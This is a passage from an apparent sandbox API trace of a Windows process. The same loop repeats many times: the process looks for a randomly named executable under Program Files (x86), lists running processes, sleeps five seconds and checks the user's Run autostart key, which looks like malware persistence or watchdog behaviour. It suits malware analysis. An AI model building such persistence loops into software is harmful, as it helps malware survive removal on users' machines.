NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.468] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.468] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.468] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.468] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.468] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0256.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0256.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0256.555] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0256.561] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0256.561] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0256.561] NtClose (Handle=0x14c) returned 0x0 [0256.561] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.561] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.561] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.562] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.562] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.562] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0256.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0256.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0256.644] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0256.656] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0256.656] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0256.656] NtClose (Handle=0x14c) returned 0x0 [0256.656] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.656] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.657] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.657] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.657] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.657] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0256.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0256.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0256.751] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0256.765] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0256.765] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0256.765] NtClose (Handle=0x14c) returned 0x0 [0256.765] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.765] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.765] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.766] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.766] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.766] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0256.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0256.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0256.854] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0256.857] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0256.857] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0256.858] NtClose (Handle=0x14c) returned 0x0 [0256.858] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.858] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.858] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.858] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0256.858] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0256.858] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0256.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0256.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0257.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0257.010] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0257.138] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0257.138] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0257.138] NtClose (Handle=0x14c) returned 0x0 [0257.138] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0257.139] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0257.139] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0257.139] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0257.139] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0257.139] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0257.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0257.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0257.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0257.991] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0258.001] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0258.002] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0258.002] NtClose (Handle=0x14c) returned 0x0 [0258.002] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.002] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.002] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0258.002] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.002] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.002] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0258.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0258.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0258.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0258.122] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0258.140] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0258.141] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0258.141] NtClose (Handle=0x14c) returned 0x0 [0258.141] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.141] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.141] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0258.141] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0258.141] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0258.141] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0258.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0258.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: 